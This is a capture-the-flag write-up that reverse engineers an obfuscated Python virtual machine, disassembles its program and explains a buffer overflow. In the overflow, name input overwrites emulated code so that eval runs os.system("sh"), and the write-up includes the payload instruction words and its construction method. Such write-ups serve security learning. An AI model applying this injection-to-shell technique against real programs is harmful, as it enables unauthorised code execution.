# Summary
The first part of this challenge is just like in [Snake Jazz](https://gitlab.com/shalaamum/ctf-writeups/-/blob/master/FE-CTF%202022/snake-jazz/writeup.md), but instead of being able to read off the flag from memory, we will have to exploit a buffer overflow vulnerability to gain remote code execution. Note: The files mentioned here can be found in [this repository](https://gitlab.com/shalaamum/ctf-writeups/-/tree/master/FE-CTF%202022/snake-oil).
# Obfuscation layer from "Snake Jazz"
This was pretty much like with the "Snake Jazz" challenge, so see my [writeup](https://gitlab.com/shalaamum/ctf-writeups/-/blob/master/FE-CTF%202022/snake-jazz/writeup.md) for more details.
We are given two files, `runme.py` and `magic.py`. Executing the former we are prompted to enter our name, and are then greeted with our name, followed by a warning:
Please enter your name
> testname
Hello, testname
Don't break anything, kthxbai
In `runme.py` we first import `magic.py`, which will define `_`. Then a huge expression involving `_` and various binary operations is evaluated. In `magic.py`, a `class B` is defined, and `_` is just defined as `B()`. Having already done "Snake Jazz", looking at the code it seems very plausible that again only deletion of `B` objects is the part of the execution that has effects we should focus on. So we again modify `magic.py` to print out calls to `__del__` that pass the initial `if not __.c:return` check, which was done in `magic2.py` and `runme2.py`.
If we execute `runme2.py` we obtain (additionally to what we already had) the following output:
__del__ called, object to reproduce:
B(a=0x9103cf41a564e0c7d5c8026456b4ee384bfce6324d999493e2a2cf4e060cf6f20faa30c012de6b7fb95a93947d84a57774af31576b2cf7e6439ccb408bfec812e5f81ba582d39f29c07d47e27175a126d4da318264318209dfe4723431f42a8525259c2f11e4deb5150aa83ca6412c5832f7a8a63da96e98121be5c1715411f7517e60f931bc9ca052b5a104f5f7e7f022d584ff5d57e1c915e8a06f2d47f14c30ff7bda97a4dfa862129f018b92490c21e5724973cb2c1c9ea6178b3de251f0d99d56f24f7654317b383a98486624d345acf804f0126bf5644fbf87cf4f904120d94623a8c8de953ba2c376ceba1901c5d6a43a39573fbb2df9f5f98c176dd0376894ae6e05fbe8eebbadd0502cf649df73ec309a39c66f24eee62d53a9f264362054b78428e25c451c3c385809e46a8d92e1a284bf031a9265fbc84f588e4c855fd5666624d7c8d11067ddf4695e6c0273532dce64c8a17fa68a1eee2461725ecc5b52be3eeb368b53f8251803477351a566d9af09393b52251b0be5afabf69ce5dd18d4d9a0a5a85248d2ff96656ca6d2d7fb3d67bb02439690e4094b8eeee9539660e212ad6bf7e30ca882aba662a5aee944213c0f1241af7e579991c0343dbf47d700be90873aeef2863e4f3acb789a193e316250dfc0d72a1d3225076a0b5f8c2e724bbe95ad52391b0bfee1b9238a14a20f60e3f75ea367a81fac08c1dae778d5f0b1faa3a4bb33d6747b269e893172b0ba092af9b984423c05d6b955b4643803963e627f4417625e2ca04b849e2f84c32cea8413823783a0a384ac81e5779d194227873eaedce94a080ebc68cacd13b8f099e7c52658fa3835464c85bb6315d16d7cafa540c6d24dd0de4db27aafc730fc80d761e23f58f8532a1e2cd4ab0da165acd8beeff061f224c242b0104546615efff24f002404f4b64273d860816c0477c057eced1f33823d0e752c5876106ab3d26819bf8810526871fba5aeabe5d6bc8e8399a8f4e872ba2f42ab9bfdef04e4546a172685293f01c199447c0f5894d3b6acdfbae1dc80e578b0616c18c4361b7ef36573a3b06dc97507b85bd3794816f8864201cdb5edf51cd3e3f505a6e90927b78031815ee135a4ae39da7130979fb0ff1014a8a54e67af64c886ca6c5a9cdb3b61711e384e69f8ab52da091e07855ebcf91323d2113a6f06250838ae5c3078a814c7b9637901d0473b994bcf2e0eb23e68073f62cef494a4c40e3b2ace23e1163639a75bc4c37a05eaadf8e89909e3ae5a29023e0e16175ec1fd43b241d88dd1eae77af65f690, b=0x85c, c=0x9103cf41a564e0c7d5c8026456b4ee384bfce6324d999493e2a2cf4e060cf6f20faa30c012de6b7fb95a93947d84a57774af31576b2cf7e6439ccb408bfec812e5f81ba582d39f29c07d47e27175a126d4da318264318209dfe4723431f42a8525259c2f11e4deb5150aa83ca6412c5832f7a8a63da96e98121be5c1715411f7517e60f931bc9ca052b5a104f5f7e7f022d584ff5d57e1c915e8a06f2d47f14c30ff7bda97a4dfa862129f018b92490c21e5724973cb2c1c9ea6178b3de251f0d99d56f24f7654317b383a98486624d345acf804f0126bf5644fbf87cf4f904120d94623a8c8de953ba2c376ceba1901c5d6a43a39573fbb2df9f5f98c176dd0376894ae6e05fbe8eebbadd0502cf649df73ec309a39c66f24eee62d53a9f264362054b78428e25c451c3c385809e46a8d92e1a284bf031a9265fbc84f588e4c855fd5666624d7c8d11067ddf4695e6c0273532dce64c8a17fa68a1eee2461725ecc5b52be3eeb368b53f8251803477351a566d9af09393b52251b0be5afabf69ce5dd18d4d9a0a5a85248d2ff96656ca6d2d7fb3d67bb02439690e4094b8eeee9539660e212ad6bf7e30ca882aba662a5aee944213c0f1241af7e579991c0343dbf47d700be90873aeef2863e4f3acb789a193e316250dfc0d72a1d3225076a0b5f8c2e724bbe95ad52391b0bfee1b9238a14a20f60e3f75ea367a81fac08c1dae778d5f0b1faa3a4bb33d6747b269e893172b0ba092af9b984423c05d6b955b4643803963e627f4417625e2ca04b849e2f84c32cea8413823783a0a384ac81e5779d194227873eaedce94a080ebc68cacd13b8f099e7c52658fa3835464c85bb6315d16d7cafa540c6d24dd0de4db27aafc730fc80d761e23f58f8532a1e2cd4ab0da165acd8beeff061f224c242b0104546615efff24f002404f4b64273d860816c0477c057eced1f33823d0e752c5876106ab3d26819bf8810526871fba5aeabe5d6bc8e8399a8f4e872ba2f42ab9bfdef04e4546a172685293f01c199447c0f5894d3b6acdfbae1dc80e578b0616c18c4361b7ef36573a3b06dc97507b85bd3794816f8864201cdb5edf51cd3e3f505a6e90927b78031815ee135a4ae39da7130979fb0ff1014a8a54e67af64c886ca6c5a9cdb3b61711e384e69f8ab52da091e07855ebcf91323d2113a6f06250838ae5c3078a814c7b9637901d0473b994bcf2e0eb23e68073f62cef494a4c40e3b2ace23e1163639a75bc4c37a05eaadf8e89909e3ae5a29023e0e16175ec1fd43b241d88dd1eae77af65f690)
The definition of `__init__` for `class B` in `magic2.py` does not actually take `a`, `b`, and `c` as parameters, so we modify `__init__` to do so, so that we can replace the complicated expression in `runme2.py` by a direct construction of the required objects as seen in the output above. We furthermore rename `__del__` to `run`, and remove various method functions such as `__lt__` of `class B` that are now not needed anymore (this does not require a lot of analysis, we can just delete some and see if the program still runs as before). This leads us to `magic3.py` and `runme3.py`.
# Roman numerals obfuscation layer
Now we have simplified the original `runme.py` a lot, but `magic3.py` still contains some obfuscation. At the start we find the following code that gets executed on import, followed by definitions of `class A` and `class B`.
import os,sys
_ = 'aIaabVaacaXadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaLanaaaoaaapaaaqaaaraaa'\
def __(a):
b=sorted(_ for _ in enumerate(_)if _[True].isupper())[::~False]
while a:
if a>=b[d][False]:
if a>=b[d][False]*(9-b[d][False]//b[-~d][False]%2)//0o12:
e=min(_[False]for _ in b if a+_[False]>=False)
return c
So there is a global variable `_` that starts out as a string, then a function `__` is defined and called a bunch of times. We do not need to understand all of the code in `__`, but the crucial side effect that we can notice is that it sets a global variable in `setattr(sys.modules[__name__],c,f)`. So to keep track of what is going on, let us add a
print(f'{c} = {f}')
as the line before or after `setattr`. This change was done in `magic4.py` and `runme4.py`. Executing `runme4.py` we obtain the following output.
I = True
II = 2
III = 3
IV = 4
V = 5
VI = 6
VII = 7
VIII = 8
IX = 9
X = 10
XI = 11
V = 5
X = 10
LX = 60
CXX = 120
DCLXV = 665
MCCCXXX = 1330
Please enter your name
> testname
Hello, testname
Don't break anything, kthxbai
From this we can speculate that the `__` function is likely only called at the start (so not in the `run` function), and its purpose is to set up global variables whose name is a roman numeral and whose value is the corresponding integer (In the case of `I` the value is not the integer `1` but instead `True`. This is probably intended to further confuse the person reverse engineering this; in the context `I` is actually used, `True` seems to act identically to `1` (which we can verify empirically).). So in `magic5.py` we remove the definition of `_` and `__` as well as the three lines calling `__`, and replace them by direct definitions of `I`, `II`, and so on. Trying `runme5.py`, we can see that there are no exceptions and behavior appears unchanged. We can next remove usage of these constants and replace them by their value, arriving at `magic6.py` and `runme6.py`, where we also changed some `False` to `0` and `True` to `1`, and cleaned up the code here and there. While doing so we might notice that `MCCCXXXI` appears somewhere even though that should not be defined. That line does not seem to be reached though.
# Analysis of the emulated machine
Quickly skimming the code left in `magic6.py` we can see that this again seems to emulate some machine that this time is using base 11 rather than 3 for its memory. In the loop running the program there is again a long case distinction for the different instructions, but beginning with
if False:
which seems to be intended as a hint that we will need to access a file `flag` on the remote instance of this challenge, and will not be able to expect to extract the flag from memory as was the case in "Snake Jazz". This will require deeper analysis of the actual program being run by the emulator than just figuring out how to print out the memory.
## Understanding how input and output happens
Apart from code that carries out arithmetic operations or shuffles data around, there are two places that seem interesting and might interact with input from the user, the `class A`, and the `elif c==10:` branch in `run`.
`class A` is defined as follows.
class A(object):
def __pos__(_):
return sys.stdin.buffer.read(1)[0]
def __add__(_,__):
def __mul__(_,__):
for __ in __.encode('latin1'):
`class A` provides reading from `stdin` and writing to `stdout`. If `a` in an object of type `A`, then `+a` will return one byte (as an integer) read from `stdin`, and if `text` is a string, then `a * text` will write the string `text`, encoded in `latin1`, to `stdout`.
There is only one place where an object of type `A` occurs, namely as the local variable `_` in the method `run` of `class B`, defined right at the start. However there is no place this variable seems to be directly used (there are a couple of occurrences of `_`, where this though refers to a new local variable, as in `a=[(_%11**5)for(_)in(a)]`).
Let us now look at the other interesting part we identified, the `elif c==10:` branch in `run`. There we find the following.
elif c==10:
So here some Python code is being evaluated. We can speculate that this will either read the input from the user directly, or use `class A`, perhaps through the local variable `_`. To find out what is going on with this `eval`, let us split up this long line a bit and print out what is being evaluated.
So let us replace the above code with the following.
elif c==10:
string_to_evaluate = (__.a//11**(a[e]*5)%11**(a[f]*5)).to_bytes(a[f]*3,'little').decode('latin1').strip('\0')
eval_result = eval(string_to_evaluate)
print(f'\neval("{string_to_evaluate}") = {eval_result}')
a[d] = eval_result or (0)
This is done in `magic7.py`. Executing `runme7.py` we obtain the following output:
Please enter your name
eval("_*'Please enter your name\n> '") = None
eval("+_") = 116
eval("+_") = 101
eval("+_") = 115
eval("+_") = 116
eval("+_") = 110
eval("+_") = 97
eval("+_") = 109
eval("+_") = 101
eval("+_") = 10
eval("_*'Hello, '") = None
eval("_*'testname\n'") = None
Don't break anything, kthxbai
eval("_*'Don\'t break anything, kthxbai\n'") = None
So this confirms that evaluation of `+_` is used to obtain input from `stdin` byte by byte, stopping at the newline, and `_*` concatenated with a string literal is used to write strings to `stdout`.
We can try here if we can immediately use our input to execute Python code. If we input `testname' + print("It worked!") + '`, we might hope that the string `_*'testname' + print("It worked!") + ''` will be evaluated. However, we will get that what is actually evaluated is `_*'testname? + print("It worked!") + ?\n'`. So single quotes seem to be replaced by question marks before evaluation. Similarly backslashes seem to be removed. So exploiting the program is not as easy as this.
## Registers and memory
The `run` function begins as follows.
def run(__):
if not __.c:return
_ = A()
a = [0]*11
while 10:
a[0] += 1
So `a` is a list of 11 `int`s, initially all zero. If we look at the `elif` branches within the loop we will be able to find a lot of uses of the components of `a`, both reading them as well as setting them to a different value. This is very suggestive that we should interpret the components of `a` as registers.
The very first line can then be interpreted as taking every register modulo `11**5`, so each register is likely supposed to hold a 5-digit nonnegative number to base 11, and this first line in the loop is handling any overflow or underflow that might have happened in the previous loop round. This already suggests that we are likely dealing with a machine that is using base 11, and where each memory unit is 5 digits wide.
The `elif` branches later depend on the value of `c`, which thus likely holds the type of instruction being executed. We see that `c` is defined as the remainder of `__[a[0]]` modulo 11. From this we can guess that `__[address]` is likely a memory access, and `a[0]` is the instruction pointer. Furthermore, as `a[0]` is incremented by 1 rather than 5 we can also guess that memory is likely addressed by 5-digit base-11 words, and not digit-wise, as was the case in "Snake Jazz", where program code and data used a different word width and thus memory was addressed by the digit.
If we look at the definition of `__getitem__` and `__setitem__`, which are reproduced below, we can see that the member variable `a` of the `class B` is an integer that stores the memory; that number is interpreted in base 11, the digits are grouped together in words of 5 digits each, and those words can be read and written individually. See the [writeup for "Snake Jazz"](todo link) for a more detailed discussion on this system of encoding memory.
def __getitem__(_,__):
return _.a//11**__%11**5
def __setitem__(_,__,___):
As a next step we can now produce `magic8.py` and `runme8.py`, where we made the code more readable by replacing various variable names. Note that we can *not* rename the local variable `_` defined at the start of `run`, because that is used in the evaluation, as we saw earlier.
One additional change from `magic7.py` to `magic8.py` should be noted.
If we go back to the `elif c==10` branch in `run`, we (after renaming the variables) have the line
string_to_evaluate = (self.a//11**(REG[e]*5)%11**(REG[f]*5)).to_bytes(REG[f]*3,'little').decode('latin1').strip('\0')
which we can now rewrite as follows.
memory_from_reg_e_of_len_reg_f = ( self.a // (11**(REG[e]*5)) ) % (11**(REG[f]*5))
string_to_evaluate = memory_from_reg_e_of_len_reg_f.to_bytes(
The first line is the part in the first brackets; this extracts `REG[f]` many words of memory starting with the word indexed by `REG[e]`, as an integer (in little endian).
The second line then converts this integer into `REG[f]*3` many bytes, also in little endian. Note that
`log_2(11**5) ≈ 17.3`, so each word of 5 base 11 digits requires 18 bits to represent, and as `2*8=16 < 18 <= 24=3*8` this explains why `REG[f]*3` is used here as the number of bytes.
Finally, the result is decoded as `latin1` and zero bytes are stripped from start and end.
We also modified the `print` telling us about the string being evaluated to also inform us about the memory address of the buffer that was used, together with its length.
## A first disassembler
To understand what the emulated program does we will need to understand the individual instructions first.
As an example, let us look at the first two instruction types.
elif c==5:
REG[REGNUM_RIP] += j-7320
elif c==2:
REG[d] = self[REG[e]+f-5]
REG[e] += g-5
The first one is clearly a jump instruction. As `j` is a constant extracted from the instruction, this is a jump to a fixed target. If we want to disassemble such an instruction we might represent it by `JMP n` where `n` will be the content of the instruction pointer `RIP` after the line has been executed.
The second instruction type loads a register from memory, with the address determined by another register, and then that register is changed by a constant. What this instruction does in general is a bit less clear, but it would make sense as a `POP` instruction, popping a value off the stack, with `REG[e]` being the stack pointer. To really understand this instruction we might have to see how it is used in the program and what values `e` and `f` and `g` tend to have.
In `magic9.py`, various changes have been made to improve our ability to analyze the program code that is being emulated. First, the output from the program itself as well as having to input a name is inconvenient. We thus modify `class A` as well as `run` so that the input is given as an argument to `run`, and output is printed to `stderr`. (This last change is just because this makes it very easy to redirect our debug output to a file while still seeing whether the output looks ok so that our changes did not break the program. It would perhaps be more usual to assign `stdout` and `stderr` the other way around, but like this just happens to be the quickest (least amount of typing) in this case, with in the end equivalent effect.) Then we add functions `disassemble_instruction` and `print_disassembly`, the first of which takes an address as an argument and returns a string that is supposed to explain what the instruction at that address does, the second prints out a disassembly of all of memory, or a subset of the words, passed by argument. To know which addresses actually hold instructions, we modify `run` to save the instructions that have been visited. This already prevents us from wasting time trying to make sense of memory interpreted as instructions that actually hold data or junk. But we might also waste time if parts of the program get decrypted in execution. Thus we modify the memory write function `__setitem__` to warn if a memory address that contains program code is being changed. If we can run the program twice (once to populate the set addresses the instruction pointer visited, and then a second time to obtain the warning messages) without getting such a warning, then we know that no decryption of code that is reached if we enter `testname` as our name in the prompt. It is still possible that instructions that are not actually reached with such an input get decrypted or reached with a different input, but if that were the case we could figure out what we need to know later after we realized how to enter such a different codepath.
Running `runme9-check-no-decryption.py` runs `run` twice as just suggested, and we can see that we can *not* see any warnings regarding program instruction addresses being written to, so the code is not encrypted.
Executing `runme9-disassemble-with-holes.py` instead outputs a disassembly on `stdout`, showing the instructions that are reached in the usual `run`. Skimming over it we see that there are some parts looking like the following lines.
...jumped over 1 words...
0017: REG7 = 92
So there is a instruction that conditionally jumps over the next instruction, and there is a hole of only this one instruction not being reached. It might be nicer to also show a disassembly for those. Thus in `runme9.py` we remove gaps of length only 1. The output on `stdout` is provided as `disassembly9`.
## Improving the disassembler
In `disassembly9` we can see various sequences of instructions, separated by gaps of different length. The two shortest consecutive sequences of instructions begin at address `117` and `145`. Let us consider the first of the two.
0117: MEM[REG10 + -1] = REG9 ; REG10 += -1
0118: REG2 = REG1
0119: REG1 = 125
0120: REG9 = RIP ; JMP 145
0121: REG7 = 125
0123: REG9 = MEM[REG10 + 0] ; REG10 += 1
0124: JMP REG9
The value of `REG9` seems to be saved in memory at the start, and recovered at the second to last line, followed by a jump to this recovered value of `REG9`. Furthermore the one other jump occurring in this short piece of code sets `REG9` to the value of `RIP` at that point (note that this is the address of the *next* instruction to be executed, so when the assignment of instruction `120` is carried out, the value of `RIP` is already `121`). This suggests that part of the function call convention being used is that `REG9` holds the return address. Additionally, the way `REG9` is saved and recovered from memory looks like `REG10` might be a stack pointer, with the stack growing downwards, and the instructions at `117` and `123` being a `PUSH` and `POP` instruction, respectively. Other places in the disassembly, for example the function that seems to span from `145` to `210`, also seem to fit with these interpretations.
Considering further the snippet from `117` above, note that `REG1` being copied to `REG2` implies that `REG1` most likely has some significance here, for example by virtue of being an argument passed to this function. Before calling the function at `145`, the register `REG1` is set to a constant value. We can guess that arguments are most likely passed via register, in the order `REG1`, `REG2`, and we can guess that this continues with `REG3`, etc., though we do not see this here yet. Then the function at `117` likely takes one argument, and the one at `145` takes two. Skimming over other parts of the disassembly they again seem to fit with this interpretation.
So let us make the disassembly more readable by incorporating some of what we have learned and abbreviating e.g. the instruction at `117` with `PUSH REG9` and the instruction at `123` with `POP REG9`. It also seems reasonable to give `REG9` and `REG10` the names `RETADDR` and `RSP`. Furthermore, we can abbreviate the combination of `REG9 = RIP` with a jump by `CALL` and `JMP RET9` by `RET`.
Additionally, it would be useful to identify function starts and ends. We can identify returns from functions by `JMP REG9`, but it may not always be clear where a functions starts. To help we will add a ">" in the output between address and disassembly if this is an address that was jumped to during execution. We add `>>` if that address was jumped to with a `CALL` instruction.
The mentioned changes have been implemented in `magic10.py` and `runme10.py`, and the output can be found in `disassembly10`.
# Analysis of the program
Let us now begin actually looking at disassembled functions, trying to understand what they do.
## Understanding some short and easy functions
Starting from the bottom we have the following short function.
0399: >> REG7 = 403
0400: REG8 = 1
0402: RET
It evaluates the string encoded by memory at address `403`. From the output of `runme8.py` we know that this string is (unless it gets changed during execution) "+_", so this function could be given the name `read_char()`, where we use the brackets to indicate that this function does not take arguments.
We then have the following slightly longer function.
0390: >> IF REG3 != 0 THEN JMPNEXT
0391: JMP 398
0392: > REG7 = MEM[REG2 + 0]
0393: MEM[REG1 + 0] = REG7
0394: REG1 += 1
0395: REG2 += 1
0396: REG3 += -1
0397: JMP 390
0398: > RET
In pseudocode this function is
while(REG3 != 0)
REG1 += 1
REG2 += 1
REG3 -= 1
Hence this function copies `REG3` words of memory from the buffer pointed to by `REG2` to the one pointed to by `REG1`. We can call this function `memcpy(dest, src, length)`.
Finally, the third short function at the bottom is the following:
0381: >> REG8 = 0
0382: > REG7 = MEM[REG1 + 0]
0384: JMP 388
0385: > REG8 += 1
0386: REG1 += 1
0387: JMP 382
0388: > REG1 = REG8
0389: RET
This returns the number of words before the zero word occuring at the memory pointed to by `REG1`, and we can call this function `len_until_zero(pointer)`.
The last low hanging fruit function is the one at `215`, reproduced below.
0215: >> REG4 = 0
0216: > IF REG3 != 0 THEN JMPNEXT
0217: JMP 228
0218: > REG7 = MEM[REG1 + 0]
0219: REG7 = REG7 * REG2
0220: REG7 = REG7 + REG4
0221: REG8 = 256
0222: REG4 = REG7 // REG8
0223: REG7 = REG7 % REG8
0224: MEM[REG1 + 0] = REG7
0225: REG1 += 1
0226: REG3 += -1
0227: JMP 216
0228: > RET
This is a loop, changing the contents of a buffer pointed to by `REG1` of length `REG3`. The instructions from `219` to `223` can be summarized as follows.
multiply_add = ((MEM[REG1] * REG2) + REG4)
REG4 = multiply_add // 256
REG7 = multiply_add % 256
We can thus interpret this function as follows: The buffer is interpreted as a little endian number `x`, in base `256`. The function takes two arguments `a` and `b` as `REG2` and `REG4`, and calculates `x*a + b`. The result is written back into the buffer, in base `256`, also little endian. Note that the words are not checked to contain an integer between `0` and `255`, so it is possible to use this function to convert a single nonnegative integer up to `11**5 - 1` into base `256`, as long as the buffer is large enough to hold the result. Let us call this function `multiply_add_base_256(pointer, factor, length, summand)`.
## Adding function names to the disassembler
To avoid having to look up or remember the addresses of functions we already identified, we have in `magic11.py` and `runme11.py` added support for printing out function names in the disassembly, including for `CALL` instructions. The new output is provided as `disassembly11`.
## The entry function
Let us now try to understand what the program does from the top level. Initially `RIP=0`, so program entry is at the start, where we find the following:
0000: RSP = 550
0001: REG1 = 37
0002: CALL 117
0003: > REG5 = 404
0004: REG7 = 95
0005: REG8 = 42
0006: REG4 = 39
0007: MEM[REG5 + 0] = REG7 ; REG5 += 1
0008: MEM[REG5 + 0] = REG8 ; REG5 += 1
0009: MEM[REG5 + 0] = REG4 ; REG5 += 1
0010: > CALL read_char()
0011: > REG7 = 10
0013: JMP 22
0014: > REG7 = 39
0016: REG1 = 63
0017: > REG7 = 92
0019: REG1 = 63
0020: > MEM[REG5 + 0] = REG1 ; REG5 += 1
0021: JMP 10
0022: > REG7 = 92
0023: REG8 = 110
0024: REG4 = 39
0025: REG3 = 0
0026: MEM[REG5 + 0] = REG7 ; REG5 += 1
0027: MEM[REG5 + 0] = REG8 ; REG5 += 1
0028: MEM[REG5 + 0] = REG4 ; REG5 += 1
0029: MEM[REG5 + 0] = REG3 ; REG5 += 1
0030: REG1 = 68
0031: CALL 117
0032: > REG1 = 404
0033: CALL 117
0034: > REG1 = 80
0035: CALL 117
0036: > HALT
We can immediately see that there are five calls to other functions, one being `read_char()`, and the other four the function at `117`. We can guess that the function at `117` is likely a print function, as we with e.g. `runme8.py` can see that there are exactly four prints happening in the program, and there is exactly one before input is taken from `stdin`, which fits with the order we see the calls here as well. From the calls here we can guess that the function at `117` likely takes one argument, the address of the string to be printed out, though we do not yet know in what format that data is.
In `magic12.py` and `runme12.py` we have provisionally added a name for the function at `117`, and also added showing the characters corresponding to numeric values, to understand e.g. the checks done with the return value of `read_char()` better (without having to consult an ASCII table).
The output for the function at the start now looks like the following.
0000: RSP = 550
0001: REG1 = 37 = b'%'
0002: CALL print_unknown_format(pointer)
0003: > REG5 = 404
0004: REG7 = 95 = b'_'
0005: REG8 = 42 = b'*'
0006: REG4 = 39 = b"'"
0007: MEM[REG5 + 0] = REG7 ; REG5 += 1
0008: MEM[REG5 + 0] = REG8 ; REG5 += 1
0009: MEM[REG5 + 0] = REG4 ; REG5 += 1
0010: > CALL read_char()
0011: > REG7 = 10 = b'\n'
0013: JMP 22
0014: > REG7 = 39 = b"'"
0016: REG1 = 63 = b'?'
0017: > REG7 = 92 = b'\\'
0019: REG1 = 63 = b'?'
0020: > MEM[REG5 + 0] = REG1 ; REG5 += 1
0021: JMP 10
0022: > REG7 = 92 = b'\\'
0023: REG8 = 110 = b'n'
0024: REG4 = 39 = b"'"
0025: REG3 = 0 = b'\x00'
0026: MEM[REG5 + 0] = REG7 ; REG5 += 1
0027: MEM[REG5 + 0] = REG8 ; REG5 += 1
0028: MEM[REG5 + 0] = REG4 ; REG5 += 1
0029: MEM[REG5 + 0] = REG3 ; REG5 += 1
0030: REG1 = 68 = b'D'
0031: CALL print_unknown_format(pointer)
0032: > REG1 = 404
0033: CALL print_unknown_format(pointer)
0034: > REG1 = 80 = b'P'
0035: CALL print_unknown_format(pointer)
0036: > HALT
So it seems this function begins by printing the "Please enter your name" message first. Then our input is written to a buffer beginning at address `404`, after first writing `_*'` into it. If the character read from `stdin` is a single quote or backslash it is replaced by `?`, as we observed earlier. After the character read from `stdin` is a newline, reading stops and a backslash, `n`, and single quote are appended, as well as a zero word. Finally, the "Hello, " string, the string just composed from our input, and finally the warning string are printed.
By seeing how the users name is read and the function that was provisionally called `print_unknown_format` called we can also deduce that this function likely actually executes python code that is stored at the pointer in base `256`, and terminated by zero. So we rename this function `eval_python_base_256(pointer)`.
Note that the stack begins at `550` and grows downwards, and the buffer holding our input begins at `404` and grows upwards, which suggests there might be a possibility of having them overlap if our input was long enough. We currently don't have enough information to exploit this, but will come back to this in a bit.
## The function `eval_python_base_256(pointer)`
The function is given by the following:
0118: REG2 = REG1
0119: REG1 = 125 = b'}'
0120: CALL 145
0121: > REG7 = 125 = b'}'
0124: RET
As the `EVALUATEPY` instruction expects the string to be stored in base `11**5`, we can guess that the function at `145` likely takes two arguments, a destination and source address, and copies the null-terminated base `256` data in the source to the destination, now in base `11**5`.
In `magic13.py` and `runme13.py` we have thus given the function at `145` the name `memcpy_from_base256_to_base_161051(dest, src)`. Furthermore we have modified the detection of addresses being jumped to so as to not count return jumps, so that we can see where loop boundaries in that function are, which will be relevant in a bit. The output can be found in `disassembly13`. As the function `memcpy_from_base256_to_base_161051(dest, src)` is a bit long it would be good to confirm what it does by observing the behavior. Hence `magic13.py` also contains functions to convert bytes to base `11**5` data, and a modification to `run` to be able to set initial registers. With this `runme13-test-145.py` verifies that the function indeed exhibits the expected behavior.
# The first vulnerability: Buffer overflow to overwrite instructions
So we are able to pass the program some input, terminated by a newline (so can not contain a newline). If it does not contain single quotes or backslashes, it is used as is, pre-concatenated with `b"_*'"` and post-concatenated with `b"\\n\x00"` (this happens in `10` to `21`). This string is stored at address `404`. Then, in `32` and `33`, the function `eval_python_base_256` is called on this buffer at `404`. In this function in turn, we call `memcpy_from_base256_to_base_161051(dest, src)` with `dest=125` and `src=404`. Note that `125` is not a very high number, there are instructions that get executed after that! In particular, the function `memcpy_from_base256_to_base_161051` starts at `145`. If our input is long enough, we will thus be able to overwrite the start of `memcpy_from_base256_to_base_161051` with new instructions. Note that after echoing the name the user is supposed to have inputted, a warning is printed out, so that execution jumps to `145` a second time.
As the code after `145` is the one that carries out the copying to `125`, we have to be careful not to have an input that is too long, otherwise we might destroy the copying code while the copy is ongoing and then the program might crash in this function rather than cleanly returning so that on the next invocation of `memcpy_from_base256_to_base_161051` our code can be executed. Let us look at the start of `memcpy_from_base256_to_base_161051`.
function memcpy_from_base256_to_base_161051(dest, src)
0146: PUSH REG5
0147: PUSH REG6
0148: REG5 = REG1
0149: REG6 = REG2
0150: REG1 = REG2
0151: CALL len_until_zero(pointer)
0152: REG7 = REG1
0153: REG7 += 1
0154: RSP = RSP - REG7
0155: PUSH REG1
0156: PUSH REG7
0157: REG3 = REG7
0158: REG2 = REG6
0159: REG1 = RSP
0160: REG1 += 2
0161: CALL memcpy(dest, src, length)
0162: REG2 = RSP
0163: REG2 += 1
0164: REG1 = REG5
0165: RSP += -2
0166: REG5 = 0 = b'\x00'
0167: > REG7 = MEM[REG2 + 0]
We can see that up to `166` there is no loop, and nothing is copied to the destination yet: The length of the source is obtained, space on the stack allocated, and then the source buffer is copied to the stack. Thus it should be fine to use an input that will cause overwriting up to and including address `166`. The idea would be that a couple of instructions starting at `145` will cause evaluation of Python code that is stored at a known address below `145`, in which we will have placed our Python payload, such as `os.system("sh")`.
Let us collect the list of requirements we have for our payload. We will call what we send `payload` and `b"_*'" + payload + b"\\n'"` the `full_payload`.
- `payload` can not contain newlines, backslashes, single quotes, or zero bytes
- The conversion of `full_payload` to base `11**5` should be at most `167 - 125 = 42` words long.
- `full_payload` converted to base `11**5` should have some successive words in the middle that converted back to base `256` correspond to the Python code we want to execute.
- `full_payload` converted to base `11**5` should have instructions starting from word `145 - 125 = 20` that cause the just mentioned Python code to execute.
- `full_payload` must be decodable to a string using `latin1`.
## Instructions to execute Python code
Here are some instructions that work.
0145: REG1 += 12
0146: REG2 = 8 = b'\x08'
0148: HALT
When the function gets called from the function `eval_python_base_256(pointer)`, the value of `REG1` will be `125`. Adding `12` gives us `137`. We will then make the base `11**5` data that is to be evaluated as Python 8 words long, ending just before these instructions.
Something like `b'os.system("sh")'` takes 15 bytes, and as we saw earlier each word of base `11**5` corresponds to roughly `17.3/8 ≈ 2.2` bytes, let us take `2.1` to be safe, and then 8 words are enough for `8 * 2.1 > 16` bytes, so this is enough.
We end with a `HALT` instruction to ensure a clean exit after we exit the shell.
To get the numeric values corresponding to these instructions we will have to look at the code, identify what value variables such as `c`, `f`, `g`, and `h` etc. need to have, and then figure out what the instructions needs to be in base 11.
We obtain that we want the following:
payload_emulator_instructions = [81935, 994, 2804, 0]
## How to cook up the payload satisfying all requirements
We have constraints on the payload that both impact its base `256` and base `11**5` represenation. Unfortunately, changing one digit in either base can completely change a lot of digits in the other base. However, note that usually this only happens to sufficiently low significance digits in the other basis. *Usually* because we might have a number that for example in base 11 has the least significant couple of digits all `0`, but not in binary. Then if we change one very low significant binary bit from `1` to `0`, this will make flip some low significance base 11 digits from `0` to `A`. Because of this it is actually best to initialize digits where we have a choice in this kind of situation to something random or of medium value, rather than for example all `0`.
Thus the way we should proceed is from the most significant end downwards, alternating which basis we adjust.
So the idea is as follows:
1. Begin with something random that, in base `256`, ends with `b"\\n'"`, and that does not otherwise contain the characters newline, backslash, single quote, or the zero byte.
2. Change some base 11 digits towards the higher significance end to contain our encoded Python code as well as the instructions we just discussed. Hope that this does not destroy what the last three bytes are in base `256` (if we were unlucky, try again from step 1).
3. When interpreting the new number in base `256` again, some bytes that are not the last three may have become illegal ones (newline, backslash, single quote, zero byte). Adjust those by adding one.
4. Adjust the first three bytes to be `b"_*'"`.
5. Convert the end result into bytes and cut off the first and last three bytes. The part in the middle is our payload.
6. Check a final time that this payload satisfies all requirements, including the decoding step regarding `latin1` and that the decoded string can actually be evaluated by Python. If not, start again from step 1. In practice, it does not take many tries until one finds a valid payload like this.
Creating a payload like this has been implemented in `runme14.py`. It will go through the steps above, and at the end verify that all properties are satisfied. If this is not the case there will be an `AssertionError` or `SyntaxError` and `runme14.py` needs to be run again. If everything verified as it should, then the emulator is run with this input as a final test. This should start a shell.
The output of `runme14.py` on a successful run is reproduced below.
user@ctf-fe-2022$ ./runme14.py
The instructions in the payload are the following when loaded at 700:
0700: REG1 += 12
0701: REG2 = 8 = b'\x08'
0703: HALT
